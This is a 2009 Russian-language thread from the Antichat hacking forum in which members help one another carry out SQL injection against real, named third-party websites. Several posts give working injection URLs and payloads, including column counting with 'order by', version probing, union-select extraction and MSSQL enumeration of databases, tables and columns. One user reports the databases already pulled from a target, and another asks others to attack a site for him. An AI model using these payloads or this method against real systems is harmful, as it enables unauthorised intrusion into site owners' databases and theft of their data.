HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.03.2009, 06:42
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.
 
Ответить с цитированием

  #2  
Старый 15.03.2009, 07:39
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

Цитата:
Сообщение от PaCo  
переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.
Ты правда думаешь, что это ему что-то даст?

2TELO:

Код:
http://mega-porno.ru/video.php?category=1')+order+by+1--+
5-ая ветка:

Код:
http://mega-porno.ru/video.php?category=1'+and+substring(version(),1,1)='5
 
Ответить с цитированием

  #3  
Старый 15.03.2009, 13:57
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от TELO  
а как тут узнать количество столбцов?
http://mega-porno.ru/video.php?category=1'

http://forum.antichat.ru/showpost.php?p=1118647

Ровно месяц прошел )
 
Ответить с цитированием

  #4  
Старый 15.03.2009, 16:48
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Нашёл багу, всё стандартно "You have an error in your SQL syntax",но при подборе столбцов order by вместо Unknown column '100' появляется Unknown column 'foto2' in 'field list'.
Как быть?

Последний раз редактировалось Imperou$; 15.03.2009 в 17:20..
 
Ответить с цитированием

  #5  
Старый 15.03.2009, 16:53
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

Скинуть ссылку..

Последний раз редактировалось R1dex; 15.03.2009 в 17:04..
 
Ответить с цитированием

  #6  
Старый 15.03.2009, 16:59
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Ничего не получал, отошли ещё раз.
Скинул в пм.

Последний раз редактировалось Imperou$; 15.03.2009 в 17:13..
 
Ответить с цитированием

  #7  
Старый 15.03.2009, 17:07
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от Imperou$  
Остальным желающим в пм могу скинуть.
кидай
 
Ответить с цитированием

  #8  
Старый 15.03.2009, 18:57
fedi
Новичок
Регистрация: 13.03.2009
Сообщений: 6
Провел на форуме:
18913

Репутация: 3
По умолчанию

С помощью DB_NAME(n) перебирая n я нашел еще
1)master
2)tempdb
3)model
4)msdb
5)lin2db
6)lin2comm
7)l2gloss
8)lin2world
9) lin2log
10)lin2clancomm
SELECT user_name();
SELECT system_user;
SELECT user;
имя юзера stat и имя таблицы с помощью:
DB_NAME() - имя таблицы: lin2world


версия - 1 or 1=@@version--
таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('и мя таблицы'))--

Проблема в том что запросы такого видв не проходят.
http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6, 7,8,9,0,11,12--
Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\
Можно ли с использованием union select сделать что нибудь?
Плиз скажите как с ними работать и что полезного и как из них взять.
Не могу понять почему удаляют пост я не там пишу что ли? Просто очень интересная для меня тема перечитал все мануалы которые нашел. но не могу понять как сделать помогите кто нить пожалусто.
 
Ответить с цитированием

  #9  
Старый 15.03.2009, 20:20
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.
 
Ответить с цитированием

  #10  
Старый 15.03.2009, 22:22
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Цитата:
Сообщение от Imperou$  
Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.
по моему это просто раскрытие пути и вовсе не скуля
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.